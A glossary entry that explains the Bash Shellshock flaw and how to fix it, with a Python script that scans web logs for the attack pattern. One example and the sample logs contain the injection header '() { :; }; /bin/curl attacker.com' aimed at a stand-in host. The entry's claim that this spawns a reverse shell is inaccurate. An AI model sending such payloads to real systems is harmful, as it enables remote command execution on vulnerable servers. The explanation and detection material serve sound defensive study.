Vol. 1 · Ed. 2026
CyberGlossary
Entry № 1149

Shellshock (CVE-2014-6271)

Reviewed by Cybersecurity entrepreneur & security researcher

What is Shellshock (CVE-2014-6271)?

Shellshock (CVE-2014-6271): A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs.


Shellshock (CVE-2014-6271, plus related CVE-2014-7169) is a flaw in how GNU Bash parsed function definitions stored in environment variables: trailing commands after the function body were executed at shell start. Because many services — CGI scripts, DHCP clients, OpenSSH ForceCommand, qmail — invoked Bash with attacker-controlled environment variables, the bug was trivially remotely exploitable, often as root. The 2014 disclosure triggered a worldwide patch storm and large-scale mass exploitation for botnets, web shells and worms. Remediation requires upgrading Bash to patched versions, replacing legacy Bash-CGI architectures, and applying defense-in-depth like dropping privileges and restricting environment passing.

Examples

  1. Sending a User-Agent header like () { :; }; /bin/curl attacker.com to a Bash-CGI endpoint to spawn a reverse shell.

  2. Exploiting a DHCP client that exports option strings into the environment of a Bash hook script.
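A detection-side view of the first example, added here and not part of the original entry: the script scans web access logs for the function-definition prefix in the fields a CGI server copies into a script's environment. The Combined Log Format layout, the whitespace-tolerant pattern and the sample lines are assumptions made for this example.

```python
import re

# Bash treated an environment value beginning with "() {" as a function
# definition. The pattern tolerates extra whitespace and matches anywhere in
# the field, a choice made for this example so spacing variants are flagged.
FUNC_PREFIX = re.compile(r"\(\s*\)\s*\{")

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Fields a CGI server copies into the script's environment
# (request line / query string, HTTP_REFERER, HTTP_USER_AGENT).
ENV_BOUND_FIELDS = ("request", "referer", "agent")


def find_shellshock_attempts(lines):
    """Return (host, field, value) for each env-bound field holding the prefix."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # not Combined Log Format: skipped, not flagged
        for field in ENV_BOUND_FIELDS:
            value = m.group(field)
            if FUNC_PREFIX.search(value):
                hits.append((m.group("host"), field, value))
    return hits


# Constructed sample lines; client addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :; }; /bin/curl attacker.com"',
    '198.51.100.7 - - [25/Sep/2014:10:01:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 87 "(){ :;}; /bin/curl attacker.com" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2014:10:02:30 +0000] "GET /docs/f(x).html HTTP/1.1" 200 904 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, field, value in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{host} {field}: {value}")
```

A hit shows that a request carried the pattern, not that the host ran it; whether the command executed depends on the Bash version behind the endpoint.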

Frequently asked questions

What is Shellshock (CVE-2014-6271)?

A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs. It belongs to the Vulnerabilities category of cybersecurity.

What does Shellshock (CVE-2014-6271) mean?

A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs.

How do you defend against Shellshock (CVE-2014-6271)?

Defences for Shellshock (CVE-2014-6271) typically combine technical controls and operational practices, as detailed in the full definition above.

What are other names for Shellshock (CVE-2014-6271)?

Common alternative names include: Bashdoor, CVE-2014-6271.
